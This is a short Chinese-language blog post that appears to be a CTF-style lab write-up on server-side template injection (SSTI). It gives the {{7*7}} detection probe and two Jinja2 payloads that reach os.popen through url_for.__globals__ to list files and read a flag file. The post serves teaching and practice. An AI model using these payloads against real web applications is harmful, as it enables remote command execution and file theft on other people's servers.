首页 > 其他分享 >实验说明 - ssti

实验说明 - ssti

时间:2024-07-27 19:40:09浏览次数:10  
标签:__ 步骤 说明 ssti 实验 恶意代码 模板

实验名称

简单的ssti

实验简介

是一种针对服务器端模板的注入漏洞。

实验说明

攻击者 将恶意代码输入到模板 服务器在执行时未对恶意代码进行处理 就输出执行

将字符串 当作模板执行

ssti注入就是使其渲染我们想要执行的的字符串

实验步骤

步骤一:

输入 {{7*7}}判断类型

image-20240727193011063

步骤二:

{{url_for.__globals__.__builtins__['__import__']('os').popen('ls').read()}}

image-20240727193042487

步骤三:

{{url_for.__globals__.__builtins__['__import__']('os').popen('cat flag').read()}}

image-20240727193139088

标签:__,步骤,说明,ssti,实验,恶意代码,模板
From: https://www.cnblogs.com/Yolololo/p/18327379

相关文章

  • ACL配置实验
    一、拓扑图及需求二、需求分析1.配置IP和开启telnet服务2.全网可达3.使用ACL配置达到实验结果三、实验过程及结果如图给各个结果配置IP地址,然后使用静态路由使各个路由能相互通信使用ACL配置使得PC1可以ping通服务器,但不能telnet服务器,PC2可以telnet服务器,但不能p......
  • 组播通信实验
    文章目录前言一、服务类型二、组播地址范围三、IGMP版本区别验证版本信息igmpv1igmpv2四、PIM原理与配置Pim-dm基础配置配置组播协议Pim-sm基础配置配置组播协议前言组播是计算机网络中数据传输的一种基本方式,组播结合了单播的点对点和广播的广泛覆盖的优点,是一种高......
  • 静态路由综合实验
    拓扑图实验需求在这里插入图片描述1、整张网络使用192.168.1.0/24网段进行划分2、R1、R2、R3、R4均有两个环回来模拟用户网段3、R5使用DHCP为PC分配IP地址4、R2、R3、R4、R5开启Telnet功能;账号密码:admin/admin;并且使用R1进行Telnet测试登录其他设备5.完成所有路由......
  • 基于YOLOv9的停车场空闲车位检测【python源码+UI界面+数据集+模型+语音报警+安装说明
    往期精品导航基于YOLOv9的脑肿瘤区域检测智慧课堂基于YOLOv8的学生上课行为检测基于YOLOv9+pyside的安检仪x光危险物物品检测(有ui)基于YOLOv9的PCB板缺陷检测基于YOLOv9的线路绝缘子缺陷检测【python源码+UI界面+数据集+模型+语音报警+安装说明】基于YOLOv9的道路状况检测【......
  • 超声波清洗机在实验室中应用优势
    超声波清洗机在实验室应用越来越广泛,其高效、环保、非接触式的清洗特点。以下是超声波清洗机在实验室应用的范围剖析:一、清洗各类实验室仪器超声波清洗机能够有效地清洗实验室中的各类仪器,包括但不限于显微镜镜头、光谱仪等精密仪器。它能够在不损害仪器表面和结构的前提下,彻......
  • java集合之Map篇——HashMap(底层源码非常详细说明)
    前言前面先做了红黑树的讲解平衡二叉树和红黑树-CSDN博客,就是为了为了Map集合做铺垫,Map的几个实现集合底层都用到了红黑树。由于HashMap的东西有点多,HashTable和TreeMap下篇再说明。一、HashMaphashMap底层是哈希表+哈希桶(数组或红黑树) Set篇的几张图会漂亮一点1.......
  • Profinet远程IO模块:模拟量模块_安装与接线说明
    XD系列插片式远程IO模块是兴达易控技术研发的分布式扩展模块。XD系列成套系统主要由耦合器、各种功能IO模块、电源辅助模块以及终端模块组成。有多种通讯协议总线的耦合器,例如PROFINET、Ether0AT、EthernetIP、00linkIE以及modbusT0P等。IO模块可分为多通道数字量输入模块、数......
  • VLAN实验报告
    一、实验拓扑图及实验需求1.拓扑图:2.需求:PC1、PC3属于VLAN2PC2、PC4属于VLAN3通过DHCP使得pc获取IP地址信息全网可达二、需求分析1.整张拓扑图分为两个广播域,在路由器上增加两个子接口2.将PC1和PC3划分到VLAN2中,将PC2和PC4划分到VLAN3中3.将交换机的接口划入到相关......
  • 防火墙——iptables实验
    [root@localhost~]#yuminstalliptables-y[root@localhost~]#systemctlstopfirewalld[root@localhost~]#systemctlstartiptables[root@server~]#iptables-F#清空所有的规则表,清空之后客户端可以访问ssh和http服务(2)实验实验......
  • OSPF实验
    一、拓扑图(6个广播域)二、需求1.整个网络使用192.168.1.0/24,进行地址分配;2.Area0区域中,R1为DR,R2为BDR;3.R3与R4之间使用密文认证,密码为[email protected];4.R1、R2、R5上各自配置一个环回接口,R1和R2的环回接口可以宣告到OSPF网络;5.设备的RID为每台设备的名称编号(比如AR1==......